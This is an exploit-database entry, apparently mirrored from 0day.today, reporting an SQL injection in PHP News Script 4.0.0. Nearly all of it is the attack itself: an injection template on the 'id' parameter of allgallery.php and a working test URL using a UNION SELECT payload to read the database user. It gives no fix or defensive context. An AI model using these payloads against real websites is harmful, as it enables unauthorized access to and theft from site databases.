id: 23980
date: 08/08/2015
title: PHP News Script 4.0.0 - SQL Injection Vulnerability
author: Meisam Monsef
cves: 

# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS
 
Exploit :
http://server/allgallery.php?id=-9999%27+[sql-command]+%23
 
Test :
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23

#  0day.today [2023-03-26]  #